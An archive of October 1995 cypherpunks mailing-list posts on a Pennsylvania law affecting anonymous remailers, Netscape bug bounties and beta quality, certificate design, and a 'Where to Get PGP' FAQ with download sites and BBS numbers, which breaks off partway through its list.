Message-ID: <9510141649.AA20952@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 13 Oct 1995 18:42:35 -0400 (EDT)
    From: Tom Edwards <tedwards@access.digex.net>

    Well folks, you can go view the new PA law yourselves at URL
    http://moose.erie.net/~italo/rssb655.html

    PA Senate Bill 655 was signed into law on June 13, 1995, and it does
    appear to make non-logged anonymous remailers illegal.

I'm guessing that you're referring to this part of the law:

  (1) [makes or possesses any instrument, apparatus, equipment or]
  makes, distributes, possesses, uses or assembles an unlawful
  telecommunication device or modifies, alters, programs or reprograms
  a telecommunication device designed, adapted or which can be used:

  . . .

  (ii) to conceal or to assist another to conceal from any [supplier
  of telecommunications] telecommunication service provider or from any
  lawful authority the existence or place of origin or of destination
  of any telecommunication; or

IANAL, but this sure sounds like one could make the case that an ISP
that allowed users to send mail to arbitrary addresses,
e. g. xxx@anon.penet.fi, would be `guilty' of assisting another to
conceal the place of origin and/or destination of a telecommunication.
I'd imagine that the authorities would be a bit more likely to go
after anonymous-remailer@xxx.net however.

In fact, I wonder if the fact that mail to rfb@cmu.edu is forwarded to
rfb@lehman.com couldn't be construed as `assistance' if I happened to
receive mail at that address through penet.  Sigh . . . .

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH/p8JNR+/jb2ZlNAQHnTgP/eycb4eJaVDVw9UTmb82ErzR29dnGSrvT
cdaGq8HoUYV1fjwzfD6aW3B8tiPkM9tcpbV5ck3LnNU7Ylgq3S8T8Zg/JNkdf0jE
J8+KO8HhONNjBgA4hRcEkrnZrHwu3S6BknxgQ+ERCASj7XRybk62pkWGciuoUZyp
FfFtv6FAS1E=
=vIYn
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 14 Oct 95 13:11:37 PDT
To: "Roy M. Silvernail" <roy@cybrspc.mn.org>
Subject: [noise] Re: Identity database, another attempt...
In-Reply-To: <951013.170750.4L0.rnr.w165w@cybrspc.mn.org>
Message-ID: <Pine.SOL.3.91.951014125249.28891A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Roy M. Silvernail wrote:

> Have you flown recently?  They now ask you this scripted question about
> whether you have been approached by anyone you don't know since arriving
> at the airport, and warn you not to accept anything from a stranger or
> leave your carry-on baggage unattended until you board the plane.  The
> ticket agent told me it was a "new FAA regulation".  I hadn't flown
> anywhere for a few years.  Anyone know how long this has been happening?

This probably dates back to the time when a Palestinian group tried to 
blow up an El Al flight from London by persuading the pregnant Irish 
girlfriend of one to carry a package for a friend. Flights from London 
have had the spiel ever since. El Al still does the best pre-flight 
screening (much more detailed questioning, and the security staff 
actually listen to the answers).

Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1)   ((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 14 Oct 95 10:10:52 PDT
To: Thomas Grant Edwards <tedwards@glue.umd.edu>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <Pine.SUN.3.91.951013184249.18307C-100000@volt.isr.umd.edu>
Message-ID: <9510141709.AA21370@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 13 Oct 1995 18:54:58 -0400 (EDT)
    From: Thomas Grant Edwards <tedwards@Glue.umd.edu>

    But looking at the ftp sites, I do see the 20b1J for SunOs4.1.3.
    Yey!

Actually it says 4.1.3_U1.  Does anyone know (a) what's the U1 mean
and (b) if, as I assume, it is an upgrade which the local powers that
be have decided against adopting, should I have any expectation of
this binary working under an older, non-upgraded, 4.1.3?

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 14 Oct 95 11:04:05 PDT
To: pjnesser@rocket.com (Philip J. Nesser)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510141700.KAA06274@oac1.rocket.com>
Message-ID: <9510141801.AA01730@all.net>
MIME-Version: 1.0
Content-Type: text


Phil typed:
> Have things really come to this?  Besides the legal implications of
> discovering a hole and then selling the information to someone, (who
> presumably will only want this information for one purpose) where has the
> attitude of doing for the sake of doing gone?

It's one thing to do good for the sake of doing good.  Most of us do that
every day by participating in this list.  It's quite another thing to be
insulted in the process.  I think that Netscape's reward is an insult.

If they think you can find major security bugs in Netscape for as little
as $1000, they should take the product off the market, or at least stop
claiming that it offers security.

>  Has Netscape been pestering
> security experts on the net for free work?  Have they been plaguing people
> or lists with email asking the net to do their jobs?  

They do far worse.  They claim security when they don't have it, and
when the cypherpunks demonstrate the false claims, Netscape offer
insulting future tribute.  I think that if they are sincere, they should
reward the individuals who found the last few holes with $25,000 each,
and show that they really mean business.

> I am tired of hearing people who may have had the urge to find weaknesses
> and bugs now going greedy and deciding that they should be paid for it.  If
> you don't want to participate then don't!  It's that simple.  If you feel
> netscape is a greedy money grubbing company who deserves to pay 25k for a
> bug report then start a company and develop a competing product which you
> feel deserves to get bug reports.  

I'm not greedy, and I have never found a novel security hole and told
the affected people they had to pay to find out about it.  I just don't
like seeing sincere people who volunteer their efforts being insulted or
trivialized or taken advantage of by the big-money people - and make no
mistake about it - that is what the Netscape offer is really all about.

The $25K is a trivial amount for finding such a hole in a product that
is supposed to secure billions of dollars worth of electronic funds
transfers.  If the bad guys find a hole, it could easily cost millions. 
If you don't believe me, look at the statistics for other holes in the
credit card and telecommunications businesses.  The losses are in the
billions each year. 

	If Netscape won't bet $25K that they have no such holes, why
should their clients bet millions that the bad guys won't find and
exploit one?

> The reason why the Internet has become so popular/powerful is the
> willingness of people to help out and distribute information.  As a
> computer/networking professional I have saved hundreds of hours worth of
> my time when someone has been able to answer a question or solve a problem
> for me.  Likewise I have and continue to give back just as many hours back
> answering others' questions.  That attitude is completely lacking in your
> suggestion and I can only hope that those opinions are in the minority
> even today.

It's not my attitude that's changing the Internet.  It's the nature of
any technology that it can be used for both good and evil.  The Internet
is no longer a research tool, and there are plenty of people using it
for criminal purposes.  If we don't start seriously rewarding people who
find and help fix the holes, we are dooming the Internet. 

And, oh yeah, the reason the Internet became so popular so fast had
nothing to do with free distribution of information.  It had to do with
the Vice President making public announcements about the NII, enormous
public relations efforts, and lots of national advertising.  The free
information has been there for 25 years or so.  The advertising and the
enormous growth started when the marketing people got going.

> The ironic part is the people who have been the most successful at finding
> bugs are not the ones who are demanding money for it!

The ironic part is that a company that claims to have a "secure" method
for using credit cards on the Internet thinks that their security is so
weak that it only takes $1000 to find a major hole.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 11:16:30 PDT
To: cypherpunks@toad.com
Subject: [URGENT] Where are we meeting today?
Message-ID: <199510141814.OAA09802@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sorry, I spaced the announcement and I can't find it in the archive.
Somewhere at Sun... Would someone please forward me the original post?

TIA,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH/+ACoZzwIn1bdtAQGkrgF+JqKcgWrM4VFYaQGbmR6gCg5SBzQe5Php
Qv9OxqnfcFFgbs6ZzzMkf+IietdzliuI
=SZst
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Sat, 14 Oct 95 14:57:33 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <DGF06D.HGJ@sgi.sgi.com>
Message-ID: <199510142157.OAA07731@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGF06D.HGJ@sgi.sgi.com>, daw@lagos.CS.Berkeley.EDU (David A Wagner) writes:
> In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
> Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
>> What you are missing is that you should not say
>> "I want to send my credit card number to Egghead Software"
>> you should say
>> "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

> Why does this sound so much like defining the problem away?

> Maybe I just don't get it...

I agree.  Sending your cc# to a key or an IP address is not what you
want to do.  As a consumer, I want to make sure that I send my cc# to
the merchant I am buying from.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 14 Oct 95 13:06:41 PDT
To: cypherpunks@toad.com
Subject: Top Math & Physics Sites (fwd)
Message-ID: <199510142006.PAA00384@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From benjie@relay.net Sat Oct 14 10:48:18 1995
Apparently-To: <vax.micron.com!cbreen@amdahl.com>,
        <vaxc.hofstra.edu!K12BAYKJ@amdahl.com>,
        <vaxc.hofstra.edu!mchong1@amdahl.com>,
        <vern.bga.com!ravage@amdahl.com>, <village.ca!keitbalk@amdahl.com>,
        <weyl.math.virginia.edu!tdv2e@amdahl.com>,
        <wg.icl.co.uk!tom@amdahl.com>, <wg.waii.com!ha9705@amdahl.com>,
        <winnie.fit.edu!gdaubert@amdahl.com>, <wop.wtb.tue.nl!nhz@amdahl.com>,
        <world.std.com!jfran@amdahl.com>,
        <xraysgi.ims.uconn.edu!dmoews@amdahl.com>,
        <yfn.ysu.edu!ah766@amdahl.com>, <zeus.achilles.net!dragon@amdahl.com>,
        <zexecsupp2.eddept.wa.edu.au!e028135@amdahl.com>
Message-Id: <m0t48ny-0005fYa@hip-hop.hh.sbay.org>
Date: Sat, 14 Oct 95 08:47 PDT
Sender: benjie@relay.net (Cyber Robot)
From: "T. Chan" <chan@pointcom.com>
Subject: Top Math & Physics Sites
Designated-To: Internet Amateur Mathematics Society
Replied-From: Internet Amateur Mathematics Society
Precedence: bulk
Sender: iams@hh.sbay.org (Internet Amateur Mathematics Society)
X-Info: email to listserv@hh.sbay.org with "FAQ iams" in the message
X-Ignore: iams  Ignore this line. It's a mailing-list-loop detector.


Dear Friends:

We'd like to invite you to check out our reviews of Math & Physics 
-related sites.  Point reviews and rates thousands of the very best 
sites on the Web, including sites in this area of interest.

There's no charge and no catch.  We hope our lively, independent reviews 
will prove valuable to members of newsgroups like this one.  We hope 
you'll stop by at http://www.pointcom.com.  Thanks for your time.

The sites are rated from 0-50, (50 being best) in Content, Presentation 
and Experience.

Site                                           Content  Presentation  Experience
The Live Artificial Life Page                  38       36            42
Amateur Science                                43       35            41
The Geometry Forum                             41       36            40
SciEd                                          45       20            38
The Pavilion of Polyhedreality                 25       35            38
Continuous Electron Beam Accelerator Facility  40       42            37
The Geometry Center                            36       39            37
Fermi National Accelerator Laboratory          37       40            36
Googolplex                                     35       23            36
The Largest Known Primes                       34       28            36






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sentiono Leowinata <sentiono@cycor.ca>
Date: Sat, 14 Oct 95 12:23:08 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <307F54CF.573F@netscape.com>
Message-ID: <Pine.OSF.3.91.951014161328.8295B-100000@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Jeff Weinstein wrote:

>   The reason we do it is that without wide exposure outside the
> company, it is virtually impossible to get complete testing coverage.
> Given the incredible variety of machines, OS's, peripherals, etc.
	    ^^^^^^^^^^^^^^^^^^		    ^^^^
> that are available in the real world, there is no way we could
> re-create every possible configuration in the lab.

Yeah right. Way to go, Jeff.
You even say that OS/2 Windows is better than Windows itself. Get real.
Don't you even realize that OS/2 is another OS! It has its own API. 
Stop treating other OSes that have an emulator like the original one. 
Netscape uses some low-level MS-Windows specific API in order to run 
well. How could you expect it to run under an emulator?
Now, wait! .. PowerPC will have OS/2 .. therefore, Netscape will say, 
sorry folks - you have to use Netscape for Windows .. bla-bla-bla.
Get real Jeff. Many people try to improve and make a wonderful product 
better, and Netscape is certainly one of them. See how many people have 
pledged (even begged - I heard) Netscape to make Netscape for OS/2 (not 
to mention Amiga (oh ya, I forgot, Netscape will tell Amiga users to 
use the Mac version because Amiga can run a Mac emulator - ha ha)).

>   We also can't visit every web page, or think of every combination
> of features that clever people in the real world come up with every
> day.  

That's true enough.

Regards,
Sent.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 14 Oct 95 16:25:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510142325.QAA10194@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 PM 10/13/95 -0700, jsw wrote:
>zoetrope@infinet.com wrote:
>>         Why would a company like Netscape jeopardise themselves by even
>> letting out a beta version so
>> hackers have time to find bugs before the full version is released. Don't
>> take me wrong I have only been on the net fer a little over a year and Love
>> Netscape.  And If I knew what I was Doing I would love to help them.....
>
>  The reason we do it is that without wide exposure outside the
>company, it is virtually impossible to get complete testing coverage.
>Given the incredible variety of machines, OS's, peripherals, etc.
>that are available in the real world, there is no way we could
>re-create every possible configuration in the lab.

I think that the main reason people have problems with the testing offer on
the beta is the lack of responses to bugs in the past.  I have seen many
complaints from people on the net complaining that bugs they had reported in
.90 had continued on into new and continued versions.  That if they received
a message back from Netscape it was just an infobot, and a rather hostilely
worded one at that.  (The infobot has been lightened up a great deal.)
Netscape has never had the staff to properly respond to the mail volume they
have received.  They have been trying to improve this but it is difficult to
man such a project with people who are able to sort through the piles of
dreck to find those people reporting serious problems.  (Also, the bug
rewards are only for "serious bugs".  Who defines what is serious and what
is not?  I know of a couple that have been hanging around for a couple of
versions now.  Maybe I should test if they got fixed with 2.0b1.  Probably
not.  They only hit a handful of people.)

Netscape is still a pretty new company.  Some seem to forget that .90 was
only released about a year ago.  How long does it take to get a proper QC
department in place?  (After the shakeup in February(?) when the new
President was hired, I would have thought it would have been done then.  Now
I am not so sure...)  I know of at least one product that went out the door
in recent months that was not properly tested.  (The stack and dialer used
with Netscape PE comes to mind.)  I realize that sales sometimes forces
things to be released before its time, but there has to be some basic
controls for quality control.  (I will not mention some of the bigger gaffes
with 1.0 and 1.1 since not all of those were publicized.  A few simple
things could have caught them before they went out the door.)

I want to see Netscape succeed, but when you hear about things like product
being released on the net without warning those people responsible for
supporting it, bug reports being ignored so a ship date can be made, and the
like, it makes you really wonder.  I am finding problems with 2.0b1 that
could have been found just by using the product for a couple of days!  Most
of the problems I have seen with Netscape could be solved with better
communications between departments within the company and some strong
testing procedures.

>  We also can't visit every web page, or think of every combination
>of features that clever people in the real world come up with every
>day.  

Some things are real simple.  Things like giving it to a handful of people
and letting them use it for a couple of days before you release it to the
rest of the world.  90% of the bugs will be pointed out through having
someone beat on it as they would any other piece of software.  And those
people should be someone other than the programmers.  (Sometimes you get too
close to the code to really stress it properly.)

I agree that you need to have a beta program.  Not everything can be tested.
But QC is important.  This is not Uncle Jim's pet project anymore...

All of this has been brought up on the net before.  Sometimes it seems like
the responses are more defensive than trying to find out the real problems
and fix them.  So far, you have been one of the few who has pushed for
getting some of these things fixed in a timely manner.  (I can name a few
others as well.  They seem to get burned out after a while though...)

I think my biggest questions right now are: "Is there a formal testing
procedure for product that is about to go out the door?  Is there a real QC
department and do they have the power to stop releases if significant
problems are found?"
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 14 Oct 95 09:06:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <9510141605.AA03487@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Frederick B. Cohen writes:
 > 	The idea that Netscape (like Microsoft) thinks they can get free
 > testing services from all over the net by real experts just by offering
 > a tee shirt is downright offensive.
[...$25k...]

They always did that, without even giving away T-shirts since they
released the first beta version to the world. As long as people enjoy
playing for free with a product and give feedback and see the program
improved... why would it stop ? 
Personally, though I prefer free products (but ppl have to get some
money for a living....), I think it is not that bad an idea, and
I trust a lot of people will continue to do it for the fun of it {As
long as the company is *really* listening to reports....}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cryptographic arrangements Ortega South Africa SDI plutonium CIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Sat, 14 Oct 95 14:24:14 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510142121.RAA06091@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes in part:

>The idea that Netscape (like Microsoft) thinks they can 
>get free testing services from all over the net by real 
>experts just by offering a tee shirt is downright 
>offensive.
>

Ditto.  The next major hack of Netscape will likely be used to 
bring that company to its knees. Unless one assumes that 
obvious backdoors will still be unprotected by their new code, 
a lot of computing time for brute force attacks and algorithm 
development will have to be spent to properly crack Netscape 
again. I seriously doubt the successful individuals will 
merely settle for fame and not fortune this time around.

OTOH I would much rather see MS get hacked next. If the 
rumors of MS being a Hard Drive Peeping Tom are true, then I 
wonder if there might be a way to send a byte bomb to their 
bit bucket??.......

Be Well








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 14 Oct 95 14:51:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141153.AA16412@all.net>
Message-ID: <199510142153.RAA01017@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net said:
> 	The idea that Netscape (like Microsoft) thinks they can get free 
> testing services from all over the net by real experts just by 
> offering a tee shirt is downright offensive.

They can. Maybe not from you, but people were poking holes in Netscape before 
*anything* was offered. Greed isn't the sole motivator of people.

> 	I have a better idea.  How about an open market in break-in 
> software.  We crack Netscape and offer the crack code to the highest 
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has 
> to outbid the competition by a factor of 2 to get the details of the 
> hole. Here's how it works:

A bit too mercenary-like for my tastes, and a bit lacking in ethics. Tracking 
down security holes and selling them to the highest bidder without giving 
details to all doesn't just hurt Netscape.

> 	I have an even better idea.  How about if Netscape gets some 
> competent programmers with real security expertise, adds in some good 
> change controls, a serious internal testing program, quality control 
> ala ISO-9000, internal IT auditors, external IT auditors, training 
> and education for their employees, and everything else it takes to be 
> in the software business in a serious way.

This sounds like a better idea. And it isn't mutually exclusive with the "Bugs 
Bounty" or T-shirts.

From what I recall, Netscape has hired decent programmers. I don't know about 
their internal business practices. From what I've seen, though, they have the 
right attitude about fixing security, rather than sweeping it under the rug 
and suing people who allege security faults. Certainly their release of their 
PRNG code is proof of that.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 14 Oct 95 15:52:44 PDT
To: cypherpunks@toad.com
Subject: ESP_ion
Message-ID: <199510142252.SAA29703@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Simone has provided a copy of the LA Times July 23 report
   on the CIA's economic espionage.


   ESP_ion  (10 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Sat, 14 Oct 95 21:28:59 PDT
To: Where to get PGP list <viacrypt@acm.org
Subject: Where to Get PGP
Message-ID: <Pine.SUN.3.91.951014211209.9333A-100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ 14 OCTOBER 1995
Long version


For questions not covered here, please see the MAIN alt.security.pgp FAQ at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt


WHAT IS THE LATEST VERSION OF PGP?

Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip  (DOS executable)   |
|to avoid RSAREF | Stale Schumacher,   | pgp262ix.zip (32-bit DOS)       |
|license.        | Kai Uwe Rommel,     | pgp262i-os2.zip (OS/2 exe)      |
|(various        | Harald Denker, and  | pgp262ib.zip (Atari)            |
|platforms)      | Peter Simons        | PGPAmi262is.lha (Amiga)         |
|                |                     | pgp262is.zip (source)           |
|                |                     | pgp262is.tar.gz (Unix source)   |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Unofficial      | PGP 2.6.2ui         | pgp262ui.zip (executable)       |
|non-USA version | Not for use in the  | pg262uis.zip (source)           |
|fully under Gnu | USA because of      | pg262uix.zip (DOS extended)     |
|public license  | probable patent     |                                 |
|(based on 2.3a  | infringement        |                                 |
|code)           | problems.           |                                 |
|________________|_____________________|_________________________________|


BUG LISTS

http://www.ifi.uio.no/~staalesc/PGP/bugs.html
http://www.mit.edu:8001/people/warlord/pgp-faq.html



WHERE CAN I GET VIACRYPT PGP?

Viacrypt has versions of PGP complete with licenses for
commercial use of the RSA and IDEA encryption algorithms.
Viacrypt PGP comes in executable code only (no source code),
but it is based on (and just as secure as) the freeware PGP.
Viacrypt PGP for Windows is the only real Windows PGP (and even
it is partially a quickwin executable that looks like a DOS
port).  Still, it is much better from an interface standpoint
than all the others.

Please contact ViaCrypt for pricing (about US $100 up), the latest
platforms, and availability at 800-536-2664 8:30am to 5:00pm
MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and
Discover credit cards.

http://www.viacrypt.com

If you have further questions, please ask:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
Suite 7
Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:

ftp://net-dist.mit.edu/pub/PGP/README
ftp://ftp.csn.net/mpj/README.MPJ
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ
ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST!
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt
ftp://ftp.eff.org

Follow the instructions found in README.Dist that you get from one of:
ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
gopher.eff.org, 1/Net_info/Tools/Crypto
gopher://gopher.eff.org/11/Net_info/Tools/Crypto
http://www.eff.org/pub/Net_info/Tools/Crypto/

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/
ftp://ftp.gibbon.com/pub/pgp/README.PGP
http://www.gibbon.com/getpgp.html
ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON THE WORLD WIDE WEB?

http://web.mit.edu/network/pgp-form.html
http://www.ifi.uio.no/~staalesc/PGP/home.html
http://rschp2.anu.edu.au:8080/crypt.html
http://www.eff.org/pub/Net_info/Tools/Crypto/
http://community.net/community/all/home/solano/sbaldwin
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
http://www.csua.berkeley.edu/cypherpunks/home.html
http://www.leo.org/archive/os2/crypt/
http://colossus.net/wepinsto/wshome.html
http://www.cs.hut.fi/ssh/crypto/


WHERE IS PGP ON COMPUSERVE?

GO NCSAFORUM.  Follow the instructions there to gain access to
Library 12: Export Controlled.

Compuserve file names are limited, so look for PGP262.ZIP,
PG262S.ZIP (source code), PGP262.GZ (Unix source code) and
PG262D.ZIP (documentation only).


AOL

Go to the AOL software library and search "PGP" or ftp from
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp.


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP.  The following carry recent versions of PGP
and allow free downloads of PGP.

US

303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here.
303-772-1062 Colorado Catacombs BBS, Longmont CO
    8 data bits, 1 stop, no parity, up to 28,800 bps. Use ANSI terminal
    emulation.  For free access: log in with your own name, answer the
    questions.
303-914-0031 The FreeMatrix ]I[
314-896-9309 The KATN BBS
317-791-9617 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
    Login Name: PGP USER  Password: PGP
501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
    Login name: PGP USER  Password: PGP
506-457=0483 Data Intelligence Group Corporation BBS
508-668-4441 Emerald City, Walpole, MA
601-582-5748 CyberGold BBS
612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a letter
    to the sysop requesting full access.
914-667-4567 Exec-Net, New York, NY
915-587-7888, Self-Governor Information Resource, El Paso, Texas


UK

01273-688888

GERMANY

+49-781-38807 MAUS BBS, Offenburg - connected to MausNet
+49-521-68000 BIONIC-BBS Login: PGP


WHERE CAN I FTP PGP CLOSE TO ME?

AU

ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx
ftp://ftp.iinet.net.au:mirrors/pgp (Australia ONLY)
ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt

DE

ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz
ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp  (Atari)
ftp://tupac-amaru.informatik.rwth-aachen.de

ES

ftp://goya.dit.upm.es
ftp://encomix.es/pub/pgp/pgp262i/pgp262i.zip

IT
